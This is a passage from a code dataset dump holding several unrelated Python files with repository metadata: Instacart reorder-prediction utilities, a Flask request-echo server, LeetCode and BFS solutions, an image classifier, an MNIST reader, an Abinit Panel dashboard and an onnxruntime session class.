X_df, model_gbm):\n df_pred = df[[\"order_id\", \"user_id\"]].copy()\n df_pred[\"pred\"] = model_gbm.predict(X_df, num_iteration=model_gbm.best_iteration)\n df_pred[\"pred_minus\"] = 1 - df_pred[\"pred\"]\n\n df_pred = df_pred.groupby([\"order_id\", \"user_id\"]). \\\n agg({'pred_minus': {'pred_none_prod': \"prod\"}, \\\n 'pred': {'pred_basket_sum': \"sum\", 'pred_basket_std':'std'}})\n\n df_pred.columns = df_pred.columns.droplevel(0)\n df_pred = df_pred.reset_index()\n\n return df_pred\n\n\ndef get_mult_none_cv(df_full, df_test, param, early_stopping_rounds=150, nfold=5):\n to_drop = [\"order_id\", \"user_id\", \"eval_set\", \"product_id\", \"product_name\", \"department\", \"aisle\", \\\n \"order_number_reverse\", \"date\", \"UP_days_no-reordered\"]\n\n res=[]\n res_test = []\n\n X_test = df_test.drop(to_drop + [\"reordered\"], axis=1)\n\n for fold in range(nfold):\n print(\"Folder: \" + str(fold))\n df_valid = df_full.query(\"(user_id % @nfold) == @fold\")\n df_train = df_full.query(\"(user_id % @nfold) != @fold\")\n X_train = df_train.drop(to_drop + [\"reordered\"], axis=1)\n X_valid = df_valid.drop(to_drop + [\"reordered\"], axis=1)\n y_train = df_train[\"reordered\"]\n y_valid = df_valid[\"reordered\"]\n\n lgb_train = lgb.Dataset(X_train, label=y_train)\n lgb_valid = lgb.Dataset(X_valid, label=y_valid)\n model_gbm = lgb.train(param, lgb_train, 100000, valid_sets=[lgb_train, lgb_valid], early_stopping_rounds=early_stopping_rounds,\n verbose_eval=100)\n res.append(get_mult_none(df_valid, X_valid, model_gbm))\n res_test.append(get_mult_none(df_test, X_test, model_gbm))\n del lgb_train, lgb_valid, model_gbm\n gc.collect()\n\n res = pd.concat(res)\n res_test = pd.concat(res_test)\n res_test = res_test.groupby([\"order_id\", \"user_id\"]).mean().reset_index()\n res = pd.concat([res, res_test])\n return res\n\n\ndef add_old_orders(df_full, df_full_none, df_full_old, df_full_none_old):\n df_col = df_full.columns.tolist()\n df_col_none = df_full_none.columns.tolist()\n df_full = pd.concat([df_full, df_full_old])\n df_full_none = pd.concat([df_full_none, df_full_none_old])\n df_full = df_full[df_col]\n df_full_none = df_full_none[df_col_none]\n return df_full, df_full_none\n\n\ndef get_df_none(df, order_none, users_fe):\n df_set = pd.merge(df, order_none, on=[\"order_id\", \"user_id\"], how=\"left\")\n df_set = pd.merge(df_set, users_fe, on=\"user_id\", how=\"left\")\n #df_set = pd.merge(df_set, mult_none_cv, on=[\"order_id\", \"user_id\"], how=\"left\")\n df_set[\"O_days_since_prior_order_diff\"] = df_set[\"days_since_prior_order\"] - df_set[\"U_days_since_mean\"]\n df_set[\"O_days_since_prior_order_rt\"] = df_set[\"days_since_prior_order\"] / df_set[\"U_days_since_mean\"]\n return df_set\n\n\ndef get_df_none_add(df_set, mult_none_cv):\n df_set = pd.merge(df_set, mult_none_cv, on=[\"order_id\", \"user_id\"], how=\"left\")\n return df_set\n\n\ndef get_df_pred(df, X_df, df_none, X_df_none, model_gbm, model_gbm_none):\n df = df.copy()\n df_none = df_none.copy()\n df[\"pred\"] = model_gbm.predict(X_df, num_iteration=model_gbm.best_iteration)\n df_none[\"pred\"] = np.clip(model_gbm_none.predict(X_df_none, num_iteration=model_gbm_none.best_iteration), 0,1)\n df_none[\"product_id\"] = \"None\"\n df_pred_none = df_none[[\"order_id\", \"user_id\", \"product_id\", \"pred\"]].copy()\n\n # Copy avoid warning\n df_pred = df[[\"order_id\", \"user_id\", \"product_id\", \"pred\"]].copy()\n\n df_test_pred = pd.concat([df_pred, df_pred_none])\n return df_test_pred\n\n\ndef calibrate_none(df_pred, 
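# Illustrative sketch, not part of the dataset record above: get_mult_none_cv
# builds out-of-fold features -- each user fold is scored by a model trained
# on the other folds, so the derived "None" features never leak a user's own
# training labels, while test rows are scored by every fold model and averaged.
# The skeleton of that pattern, with fit/score left as abstract callables:
def out_of_fold(df_full, df_test, nfold, fit, score):
    oof, test_parts = [], []
    for fold in range(nfold):
        train = df_full[df_full["user_id"] % nfold != fold]
        valid = df_full[df_full["user_id"] % nfold == fold]
        model = fit(train)
        oof.append(score(model, valid))       # out-of-fold predictions
        test_parts.append(score(model, df_test))
    # average the nfold test predictions; keep validation predictions as-is
    return oof, test_parts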
none_penalisation=0):\n df_pred = df_pred.copy()\n cond = df_pred[\"product_id\"] == 'None'\n df_pred.loc[cond, \"pred\"] = df_pred.loc[cond, \"pred\"] - none_penalisation\n return df_pred\n\n\ndef groupby_optimised_pred(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n group_no_none[\"precision\"] = group_no_none[\"pred\"].expanding().mean()\n group_no_none[\"precision_none\"] = (group_no_none[\"pred\"].expanding().sum()) / (group_no_none.expanding()[\"pred\"].count() + 1)\n group_no_none[\"recall\"] = group_no_none[\"pred\"].expanding().sum() / (group_no_none[\"pred\"].sum() - 0)\n group_no_none[\"f_score\"] = (2 * group_no_none[\"precision\"] * group_no_none[\"recall\"]) / \\\n (group_no_none[\"precision\"] + group_no_none[\"recall\"])\n group_no_none[\"f_score_none\"] = (2 * group_no_none[\"precision_none\"] * group_no_none[\"recall\"]) / \\\n (group_no_none[\"precision_none\"] + group_no_none[\"recall\"]) + none_gain\n\n if group_no_none[\"f_score\"].max() > group_no_none[\"f_score_none\"].max():\n max_score = group_no_none[\"f_score\"].max()\n max_index = np.where(group_no_none[\"f_score\"] == group_no_none[\"f_score\"].max())[0][0]\n else:\n max_score = group_no_none[\"f_score_none\"].max()\n max_index = np.where(group_no_none[\"f_score_none\"] == group_no_none[\"f_score_none\"].max())[0][0]\n\n group_no_none = group_no_none[0:(max_index + 1)]\n\n res = group_no_none # .drop([\"precision\", \"recall\", \"f_score\"], axis=1)\n\n if none_gain > max_score + 0.0:\n res = group_none\n\n # if (none_gain > group_no_none[\"pred\"].values[0] + 0.11): #Worsen score, need to understand why\n # res = group_none\n\n return res\n\n\ndef groupby_optimised_pred(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n group_no_none[\"precision\"] = group_no_none[\"pred\"].expanding().mean()\n basket_size = group_no_none[\"pred\"].sum() #0.75 #- 0.10 # Empirically found, could be finest, f-score is asymetric\n group_no_none[\"recall\"] = group_no_none[\"pred\"].expanding().sum() / basket_size\n group_no_none[\"f_score\"] = (2 * group_no_none[\"precision\"] * group_no_none[\"recall\"]) / (group_no_none[\"precision\"] + group_no_none[\"recall\"])\n f_score = group_no_none[\"f_score\"].max()\n\n max_index = np.where(group_no_none[\"f_score\"] == f_score)[0][0]\n group_no_none = group_no_none[0:(max_index+1)] # Could be (max_index+k) with k>1 if the limit is risky maybe?\n\n # f_score_none is the expected f_score if we add none\n precision_none = (group_no_none[\"pred\"].sum()) / (group_no_none.shape[0] + 1)\n recall_none = group_no_none.iloc[-1][\"recall\"]\n f_score_none = (2 * precision_none * recall_none) / (precision_none + recall_none)\n\n res = group_no_none #.drop([\"precision\", \"recall\", \"f_score\"], axis=1)\n # Add none if it's worth it\n # 0.07 and not 0 because f_score is under-estimated, could be finest\n if none_gain - (f_score - f_score_none) > 0.07:\n res = pd.concat([res, group_none])\n\n if (none_gain > f_score + 0.0):\n res = group_none\n\n #if (none_gain > group_no_none[\"pred\"].values[0] + 0.11): #Worsen score, need to understand why\n # res = group_none\n\n return res\n\n\ndef filter_optimised_pred(df):\n df[\"is_none\"] = (df[\"product_id\"] == 'None').astype(int)\n df = df.sort_values([\"is_none\", \"pred\"], ascending=False).drop(\"is_none\", axis=1)\n df = df. \\\n groupby(\"user_id\"). 
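# Illustrative sketch, not part of the dataset record above (it simplifies
# groupby_optimised_pred by dropping the None handling): the cutoff logic
# treats the sorted probabilities as expected precision/recall -- expanding
# precision is the running mean of the predictions, expected recall the
# running sum over the total sum -- and cuts where the F1 estimate peaks.
import numpy as np

def best_cutoff(preds):
    p = np.sort(np.asarray(preds))[::-1]
    precision = np.cumsum(p) / np.arange(1, len(p) + 1)
    recall = np.cumsum(p) / p.sum()
    f1 = 2 * precision * recall / (precision + recall)
    return int(f1.argmax()) + 1  # keep this many top products

print(best_cutoff([0.9, 0.7, 0.3, 0.05]))  # -> 2 with these toy values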
\\\n apply(groupby_optimised_pred).reset_index(drop=True)\n return df\n\n\ndef filter_maximize_expectation(df):\n df[\"is_none\"] = (df[\"product_id\"] == 'None').astype(int)\n df = df.sort_values([\"is_none\", \"pred\"], ascending=False).drop(\"is_none\", axis=1)\n df = df. \\\n groupby(\"user_id\"). \\\n apply(groupby_maximize_expectation).reset_index(drop=True)\n return df\n\n\ndef groupby_maximize_expectation(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n pred = group_no_none[\"pred\"].values\n # Avoid weird llvm bug with numba\n if pred.shape[0] == 1:\n pred = np.append(pred, 0)\n\n best_k, predNone, max_f1 = F1Optimizer.maximize_expectation(pred, none_gain)\n\n res = group_no_none.iloc[:best_k]\n if predNone:\n res = pd.concat([res, group_none])\n\n return res\n\n\ndef compute_fscore(df, df_pred):\n df_none_true = df. \\\n groupby([\"order_id\", \"user_id\"])[\"reordered\"].sum().\\\n reset_index()\n\n # Warning bellow but don't know where :/\n # If atleast one reorderd then None is 0, otherwise 1\n df_none_true[\"reordered\"] = (df_none_true[\"reordered\"] < 1).astype(int)\n df_none_true.loc[:,\"product_id\"] = \"None\"\n df = pd.concat([df, df_none_true])\n df_y_true = df.query(\"reordered==1\").groupby(\"user_id\")[\"product_id\"].unique().reset_index()\n df_y_true.columns = [\"user_id\", \"y_true\"]\n df_y_pred = df_pred.groupby(\"user_id\")[\"product_id\"].unique().reset_index()\n df_y_pred.columns = [\"user_id\", \"y_pred\"]\n\n res = pd.merge(df_y_true, df_y_pred, on=\"user_id\", how=\"left\")\n cond = res[\"y_pred\"].isnull()\n res.loc[cond, \"y_pred\"] = np.array(['None'])\n\n res = res.apply(lambda x: multilabel_fscore(x[\"y_true\"], x[\"y_pred\"]), axis=1)\n return res.mean()\n\n\n","repo_name":"jacquespeeters/instacart-market-basket-analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":31617,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"23683326812","text":"import platform\nfrom flask import Flask, json, request\n\napp = Flask(__name__)\nALL_METHODS = \"GET POST PUT DELETE HEAD PATCH\".split(' ')\n\n\n@app.route('/', defaults={'path': ''}, methods=ALL_METHODS)\n@app.route('/', methods=ALL_METHODS)\ndef catch_all(path):\n return json.jsonify(dict(request=dict(path=path,\n headers=dict(request.headers),\n method=request.method,\n form=request.form,\n url=request.url),\n server=dict(hostname=platform.node(),\n remote=request.remote_addr,\n )))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"factorysh/docker-http-mirror","sub_path":"mirror.py","file_name":"mirror.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28482206014","text":"# https://leetcode.com/problems/furthest-building-you-can-reach/\n\nclass Solution:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n heap = []\n\n for i in range(len(heights) - 1):\n if bricks < 0:\n return i - 1\n\n if heights[i] >= heights[i+1]:\n continue\n\n climb = heights[i+1] - heights[i]\n if len(heap) < ladders:\n heappush(heap, climb)\n\n elif ladders == 0 or climb <= heap[0]:\n bricks -= climb\n\n elif climb > heap[0]:\n bricks -= heappop(heap)\n heappush(heap, climb)\n\n return i if bricks < 0 else i + 
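# Illustrative usage note, not part of the dataset record above: mirror.py
# echoes request metadata back as JSON on every path and method, so once it is
# running (python mirror.py) it can be probed with, for example,
#     curl -X POST -d 'a=1' http://localhost:5000/any/path
# and the response carries the path, headers, method, form data and serving
# hostname -- handy for checking what a proxy or load balancer actually forwards.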
1\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_14/furthest-building-you-can-reach.py","file_name":"furthest-building-you-can-reach.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5793756191","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy, h5py\nimport helper as help\n\n\n\n\ndef load_dataset():\n with h5py.File('E:\\pycharmprojects\\CNN\\week2-programming-project\\datasets/train_catvnoncat.h5',\n \"r\") as train_dataset:\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:])\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:])\n\n with h5py.File('E:\\pycharmprojects\\CNN\\week2-programming-project\\datasets/test_catvnoncat.h5', \"r\") as test_dataset:\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:])\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:])\n classes = np.array(test_dataset[\"list_classes\"][:])\n\n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n\n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\n\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nprint(classes[0].decode(\"utf-8\"))\nprint(classes[1].decode(\"utf-8\"))\nindex = 25\n\nplt.subplot(141)\nplt.imshow(train_set_x_orig[index])\n\nprint(\"y = \" + str(train_set_y[:, index]) + \", it's a '\" + classes[np.squeeze(train_set_y[:, index])].decode(\n \"utf-8\") + \"' picture.\")\n\nprint(train_set_x_orig.shape)\n\n# splitting the multicolor image at index into r g and b streams\n\ntest_r = train_set_x_orig[index].copy()\ntest_g = train_set_x_orig[index].copy()\ntest_b = train_set_x_orig[index].copy()\n\n# idea behind this slicing : completely removing the r and b component from an image will give me the green component only\ntest_r[:, :, 1] = 0\ntest_r[:, :, 2] = 0\ntest_g[:, :, 0] = 0\ntest_g[:, :, 2] = 0\ntest_b[:, :, 0] = 0\ntest_b[:, :, 1] = 0\n\n# playing around with image coloring\n# test_random=train_set_x_orig[index].copy()\n# test_random[:,:,0]=(test_random[:,:,0]+255*np.random.rand())%255\n# test_random[:,:,1]=(test_random[:,:,1]+255*np.random.rand())%255\n# test_random[:,:,2]=(test_random[:,:,2]+255*np.random.rand())%255\n\nplt.subplot(142)\nplt.imshow(test_r)\nplt.subplot(143)\nplt.imshow(test_g)\nplt.subplot(144)\nplt.imshow(test_b)\nplt.show()\n\nm_train = train_set_x_orig.shape[0]\nm_test = test_set_y.shape[1]\nimg_height = train_set_x_orig.shape[1]\nimg_width = train_set_x_orig.shape[2]\nprint(f\"{m_train} {m_test} {img_height} {img_width}\")\n\n# flattening the vector\n# x=(test_r+test_g+test_b).reshape(3*img_height*img_width,1)\n# print(x)\nflatten_train = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\nflatten_test = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n\nprint(test_set_y.shape)\nprint(train_set_y.shape)\nprint(flatten_train.shape)\nprint(flatten_test.shape)\n\n# standardizing the data as a part of preprocessing (improves the quality of data)\ntrain_set_x = flatten_train / 255\ntest_set_x = flatten_test / 255\n\n# preprocessing complete\n\n# implementing the neural network for image 
classification\n\nhelp.model(train_set_x_orig,train_set_y,train_set_x_orig,test_set_y)\n","repo_name":"anushka567/CNN","sub_path":"catOrNotCat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20750067326","text":"from collections import deque\nn = int(input())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n\ndx = [0, -1, 1, 0]\ndy = [-1, 0, 0, 1]\n\nsize, count, ans = 2, 0, 0\ndef bfs(x, y):\n short = []\n flag = True\n min_dist = 100000000000\n global size, count, ans\n visited = [[0] * n for _ in range(n)]\n queue = deque()\n queue.append((x, y))\n while(queue):\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n:\n #최단거리 먹을 수 있는 물고기 칸 -> 같은 거리에 있으면 왼쪽\n if 0 < graph[nx][ny] < size and visited[nx][ny] == 0:\n visited[nx][ny] = visited[x][y] + 1\n if min_dist >= visited[nx][ny]:\n min_dist = visited[nx][ny]\n short.append([nx, ny])\n flag = False\n #비어있는 칸(0)이거나 size 같은 물고기 칸 + 다른 칸에서 물고기를 먹었다면 flag=False가 되어 더이상 queue에 추가 x\n elif (graph[nx][ny] == 0 or graph[nx][ny] == size) and visited[nx][ny] == 0 and flag:\n visited[nx][ny] = visited[x][y] + 1\n queue.append((nx, ny))\n if short:\n short.sort()\n count += 1\n if count >= size:\n size += 1\n count = 0\n ans += visited[short[0][0]][short[0][1]]\n graph[short[0][0]][short[0][1]] = 0\n return [short[0][0], short[0][1]]\n else:\n return 0\n \nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 9:\n graph[i][j] = 0\n res = bfs(i, j)\n while(res):\n res = bfs(res[0], res[1])\nprint(ans)\n ","repo_name":"jongbin26/coding_test","sub_path":"python/16236.py","file_name":"16236.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13788446861","text":"import os\nimport struct\nimport numpy as np\nimport cv2\n\n\"\"\"\nLoosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py\nwhich is GPL licensed.\n\"\"\"\n\ndef read(dataset = \"training\", path = \".\"):\n \"\"\"\n Python function for importing the MNIST data set. 
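# Not part of the dataset record above: the Korean comments in 16236.py (the
# "baby shark" BFS problem) state the rules the code implements: eat the
# nearest fish smaller than the current size, breaking distance ties by the
# topmost-then-leftmost cell (the short.sort() call), treat empty cells (0)
# and fish of equal size as passable, and stop queueing further cells once an
# edible fish has been found at the current distance (the flag variable).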
It returns an iterator\n of 2-tuples with the first element being the label and the second element\n being a numpy.uint8 2D array of pixel data for the given image.\n \"\"\"\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n r_lbl = np.zeros((num, 10))\n for i in range(len(lbl)):\n r_lbl[i][lbl[i]] = 1\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n img = np.divide(img, 255.0)\n get_img = lambda idx: (r_lbl[idx].astype(np.float64), img[idx].reshape(-1).astype(np.float64))\n # Create an iterator which returns each image in turn\n yield num\n while True:\n for i in range(len(lbl)):\n yield get_img(i)\n\ndef package_data(f,size):\n r_img = None\n r_label = None\n for i in range(size):\n if i == 0:\n r_label, r_img = next(f)\n else:\n tmp_label, tmp_img = next(f)\n r_label = np.concatenate((r_label, tmp_label))\n r_img = np.concatenate((r_img, tmp_img))\n return reshape(r_img, size), reshape(r_label, size)\n\ndef reshape(n_a, size):\n l_size = n_a.shape[0]\n row_size = l_size // size\n col_size = size\n return n_a.reshape(col_size, row_size)\n\nif __name__ == '__main__':\n f = read(path='MNIST_data')\n print(next(f))\n # label, img = next(f)\n # print(img.shape)\n # cv2.imshow('img',img)\n # cv2.waitKey(0)\n # print(\"label: {}\".format(label))\n # print(\"img : {}\".format(img))\n # print(img.shape)\n img, label = package_data(f, 500)\n index = 450\n print(img[index])\n # cv2.imshow('img', img[index].reshape(28,28))\n # cv2.waitKey(0)\n # print(img[99])\n # ascii_show(img[0])","repo_name":"neineihao/Deep_Learning","sub_path":"mnist_read.py","file_name":"mnist_read.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21895154600","text":"\"\"\"Panel dashboard.\"\"\"\nimport os\nfrom fkiss.termcolor import cprint\n\ntry:\n import param\n import panel as pn\nexcept ImportError as exc:\n cprint(\"Use `conda install panel` or `pip install panel` to install the python package.\", \"red\")\n raise exc\n\ndef _df(df):\n return pn.widgets.DataFrame(df, disabled=True)\n\n\n# Possible approach to display big SVG files: https://github.com/ariutta/svg-pan-zoom\n#\n\n\nclass ProjectViewer(param.Parameterized):\n \"\"\"\n A Dashboard to browse the source code, visualize connections among directories,\n files and procedures inside the Abinit project.\n Panel can can be executed either inside a jupyter notebook or as a standalone bokeh app.\n \"\"\"\n\n engine = pn.widgets.Select(value=\"dot\",\n options=['dot', 'neato', 'twopi', 'circo', 'fdp', 'sfdp', 'patchwork', 'osage'])\n\n def __init__(self, proj, **params):\n super().__init__(**params)\n self.proj = proj\n self._layout()\n\n def _layout(self):\n self.dir2files = self.proj.groupby_dirname()\n self.dirname2path = {os.path.basename(p): p for p in self.dir2files}\n self.dir_select = pn.widgets.Select(name=\"Directory\", 
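The mnist_read.py record above pulls the IDX headers apart with struct.unpack(">II", ...) — big-endian unsigned 32-bit integers — before bulk-loading the payload with np.fromfile. It also branches on `dataset is "training"`, which compares object identity rather than value and only happens to work because CPython interns short string literals (recent interpreters emit a SyntaxWarning for it); `==` is the correct test. A sketch of the same header-then-payload pattern against an in-memory buffer, with fabricated bytes standing in for a real IDX label file:

import io
import struct
import numpy as np

# Fabricated IDX-style label stream: magic 2049, count 3, then label bytes.
buf = io.BytesIO(struct.pack(">II", 2049, 3) + bytes([7, 2, 9]))

magic, num = struct.unpack(">II", buf.read(8))      # big-endian header
labels = np.frombuffer(buf.read(), dtype=np.uint8)  # bulk payload

dataset = "training"
assert dataset == "training"  # value comparison; `is` tests identity
print(magic, num, labels)     # 2049 3 [7 2 9]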
options=list(self.dirname2path.keys()))\n self.all_pubs = self.proj.get_all_public_procedures()\n\n width = 200\n self.file_select = pn.widgets.Select(name=\"Fortran File\", width=width)\n self.pubproc_select = pn.widgets.Select(name=\"Public Procedure\", width=width)\n self.datatype_select = pn.widgets.Select(name=\"Datatype\", width=width)\n\n self.find_proc = pn.widgets.AutocompleteInput(name='Find Procedure', options=list(self.all_pubs.keys()),\n placeholder='Enter procedure name', width=width)\n self.find_proc_btn = pn.widgets.Button(name=\"Find Procedure\", button_type='primary', width=width)\n self.find_proc_btn.on_click(self.on_find_proc_btn)\n\n self.all_datatypes_and_fortfiles = self.proj.get_all_datatypes_and_fortfile()\n self.find_dtype = pn.widgets.AutocompleteInput(name='Find Datatype',\n options=list(self.all_datatypes_and_fortfiles.keys()),\n placeholder='Enter datatype name', width=width)\n self.find_dtype_btn = pn.widgets.Button(name=\"Find DataType\", button_type='primary', width=width)\n self.find_dtype_btn.on_click(self.on_find_dtype_btn)\n\n self.tabs = pn.Tabs(\n (\"Directory\", self.view_dirname),\n (\"File\", self.view_fort_file),\n (\"Procedure\", self.view_pubproc),\n (\"Datatype\", self.view_datatype),\n )\n\n controllers = pn.Row(\n pn.Column(self.dir_select, self.file_select),\n pn.Column(self.pubproc_select, self.datatype_select),\n pn.Column(self.find_proc, self.find_proc_btn),\n pn.Column(self.find_dtype, self.find_dtype_btn),\n #pn.Column(self.engine),\n #, self.rerun_btn),\n #sizing_mode='scale_width'\n )\n\n self.panel = pn.Column(controllers, self.tabs, sizing_mode=\"scale_width\")\n\n def _find_fort_file(self, dirpath):\n for fort_file in self.dir2files[dirpath]:\n if fort_file.name == self.file_select.value: return fort_file\n else:\n raise ValueError(\"Cannot find fortran file with name: `%s` in `%s`\" % (\n self.file_select.value, dirpath))\n\n @param.depends('dir_select.value')\n def view_dirname(self):\n dirpath = self.dirname2path[self.dir_select.value]\n # Update widgets.\n self.file_select.options = [f.name for f in self.dir2files[dirpath]]\n if hasattr(self, \"tabs\"): self.tabs.active = 0\n\n return pn.Row(_df(self.proj.get_stats_dir(dirpath)),\n self.proj.get_graphviz_dir(dirpath, engine=self.engine.value),\n sizing_mode=\"scale_width\")\n\n @param.depends('file_select.value')\n def view_fort_file(self):\n dirpath = self.dirname2path[self.dir_select.value]\n fort_file = self._find_fort_file(dirpath)\n\n # Update widgets.\n self.pubproc_select.options = list(fort_file.all_public_procedures.keys())\n self.datatype_select.options = list(fort_file.all_datatypes.keys())\n if hasattr(self, \"tabs\"): self.tabs.active = 1\n\n return pn.Row(_df(fort_file.get_stats()),\n fort_file.get_graphviz(engine=self.engine.value),\n sizing_mode=\"scale_width\")\n\n @param.depends('pubproc_select.value')\n def view_pubproc(self):\n pubname = self.pubproc_select.value\n if pubname is None: return\n obj = self.proj.find_public_entity(pubname)\n graph = self.proj.get_graphviz_pubname(pubname, engine=self.engine.value)\n if hasattr(self, \"tabs\"): self.tabs.active = 2\n return pn.Row(obj, graph, sizing_mode=\"scale_width\")\n\n @param.depends('datatype_select.value')\n def view_datatype(self):\n typename = self.datatype_select.value\n if typename is None: return\n dirpath = self.dirname2path[self.dir_select.value]\n fort_file = self._find_fort_file(dirpath)\n #print(\"fort_file.path\", fort_file.path)\n dtype = fort_file.all_datatypes[typename]\n if hasattr(self, 
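The viewer in this record leans on param's reactive model: methods decorated with @param.depends('widget.value') are re-run by Panel whenever the named parameter changes, which is how dir_select drives view_dirname and so on down the widget chain. The dependency mechanism can be seen without any Abinit code — a toy sketch assuming only the param package is installed; Panel would re-render such a method automatically, while calling it directly, as here, just shows the current state.

import param

class Counter(param.Parameterized):
    value = param.Integer(default=0)

    @param.depends('value')
    def view(self):
        # Watchers re-invoke this whenever `value` changes.
        return f"value is {self.value}"

c = Counter()
print(c.view())   # value is 0
c.value = 3
print(c.view())   # value is 3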
\"tabs\"): self.tabs.active = 3\n return pn.Row(dtype)\n\n def on_find_proc_btn(self, event):\n pubname = self.find_proc.value\n if pubname is None: return # or pubname not in self.all_pubs: return\n proc = self.all_pubs[pubname]\n dirpath = proc.dirpath\n file_basename = os.path.basename(proc.path)\n fort_file = self.proj.fort_files[file_basename]\n\n # Update widgets.\n self.dir_select.value = os.path.basename(dirpath)\n self.file_select.options = [f.name for f in self.dir2files[dirpath]]\n self.pubproc_select.options = list(fort_file.all_public_procedures.keys())\n self.datatype_select.options = list(fort_file.all_datatypes.keys())\n\n self.pubproc_select.value = pubname\n if hasattr(self, \"tabs\"): self.tabs.active = 2\n\n def on_find_dtype_btn(self, event):\n dname = self.find_dtype.value\n dtype, fort_file = self.all_datatypes_and_fortfiles[dname]\n\n # Update widgets.\n self.dir_select.value = os.path.basename(fort_file.dirname)\n self.file_select.value = fort_file.basename\n self.datatype_select.value = dname\n if hasattr(self, \"tabs\"): self.tabs.active = 3\n","repo_name":"abinit/abinit","sub_path":"fkiss/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"72"} +{"seq_id":"35852833096","text":"import os\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport onnxruntime as ort\nfrom PIL import Image\nfrom PIL.Image import Image as PILImage\n\n\nclass BaseSession:\n def __init__(\n self,\n model_name: str,\n sess_opts: ort.SessionOptions,\n providers=None,\n *args,\n **kwargs\n ):\n self.model_name = model_name\n\n self.providers = []\n\n _providers = ort.get_available_providers()\n if providers:\n for provider in providers:\n if provider in _providers:\n self.providers.append(provider)\n else:\n self.providers.extend(_providers)\n\n self.inner_session = ort.InferenceSession(\n str(self.__class__.download_models(*args, **kwargs)),\n providers=self.providers,\n sess_options=sess_opts,\n )\n\n def normalize(\n self,\n img: PILImage,\n mean: Tuple[float, float, float],\n std: Tuple[float, float, float],\n size: Tuple[int, int],\n *args,\n **kwargs\n ) -> Dict[str, np.ndarray]:\n im = img.convert(\"RGB\").resize(size, Image.LANCZOS)\n\n im_ary = np.array(im)\n im_ary = im_ary / np.max(im_ary)\n\n tmpImg = np.zeros((im_ary.shape[0], im_ary.shape[1], 3))\n tmpImg[:, :, 0] = (im_ary[:, :, 0] - mean[0]) / std[0]\n tmpImg[:, :, 1] = (im_ary[:, :, 1] - mean[1]) / std[1]\n tmpImg[:, :, 2] = (im_ary[:, :, 2] - mean[2]) / std[2]\n\n tmpImg = tmpImg.transpose((2, 0, 1))\n\n return {\n self.inner_session.get_inputs()[0]\n .name: np.expand_dims(tmpImg, 0)\n .astype(np.float32)\n }\n\n def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]:\n raise NotImplementedError\n\n @classmethod\n def checksum_disabled(cls, *args, **kwargs):\n return os.getenv(\"MODEL_CHECKSUM_DISABLED\", None) is not None\n\n @classmethod\n def u2net_home(cls, *args, **kwargs):\n return os.path.expanduser(\n os.getenv(\n \"U2NET_HOME\", os.path.join(os.getenv(\"XDG_DATA_HOME\", \"~\"), \".u2net\")\n )\n )\n\n @classmethod\n def download_models(cls, *args, **kwargs):\n raise NotImplementedError\n\n @classmethod\n def name(cls, *args, **kwargs):\n raise 
